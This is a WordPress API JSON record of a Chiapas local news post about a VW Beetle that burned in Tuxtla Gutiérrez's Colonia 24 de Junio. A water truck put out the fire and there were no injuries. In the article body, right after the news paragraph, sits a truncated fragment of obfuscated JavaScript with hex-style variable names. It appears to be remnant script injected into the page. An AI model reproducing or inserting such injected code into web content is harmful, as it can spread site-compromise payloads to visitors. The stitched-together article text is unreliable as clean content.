{"id":1893,"date":"2022-05-05T02:17:32","date_gmt":"2022-05-05T02:17:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1893"},"modified":"2022-05-05T02:17:34","modified_gmt":"2022-05-05T02:17:34","slug":"escarabajo-se-incendia-en-la-24-de-junio","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1893","title":{"rendered":"Escarabajo se incendia en la 24 de Junio"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/FB_IMG_1651716975959-1024x576.jpg\" alt=\"\" class=\"wp-image-1894\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/FB_IMG_1651716975959-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/FB_IMG_1651716975959-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/FB_IMG_1651716975959-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/FB_IMG_1651716975959.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 4 de mayo del 2022. Tuxtla Guti\u00e9rrez &#8211; Por un posible corto circuito un Vw Sedan tipo Vocho se incendi\u00f3 completamente cuando circulaba en la Calle R\u00edo Grijalva y Avenida R\u00edo Cuxtepeques de la Colonia 24 de Junio de Tuxtla Guti\u00e9rrez este mi\u00e9rcoles por la tarde. Los reportes de tr\u00e1nsito dieron a conocer que, de manera repentina el escarabajo comenz\u00f3 a quemarse de la parte de enfrente. La propietaria sali\u00f3 apresurada de la unidad y pidi\u00f3 ayuda. Tras llamar a los n\u00fameros de emergencias, pero no hab\u00edan unidades disponibles. Como un milagro en este punto circulaba una pipa de agua y apoy\u00f3 para apagar el incendio. Los da\u00f1os \u00fanicamente fueron materiales. Con el apoyo de una gr\u00faa el vocho fue retirado del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 4 de mayo del 2022. Tuxtla Guti\u00e9rrez &#8211; Por un posible corto circuito un Vw Sedan tipo Vocho se incendi\u00f3 completamente cuando circulaba en la Calle R\u00edo Grijalva y Avenida R\u00edo Cuxtepeques de la Colonia 24 de Junio de Tuxtla Guti\u00e9rrez este mi\u00e9rcoles por la tarde. Los reportes de tr\u00e1nsito dieron a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1894,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1893","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1893","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1893"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1893\/revisions"}],"predecessor-version":[{"id":1895,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1893\/revisions\/1895"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1894"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1893"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1893"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1893"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}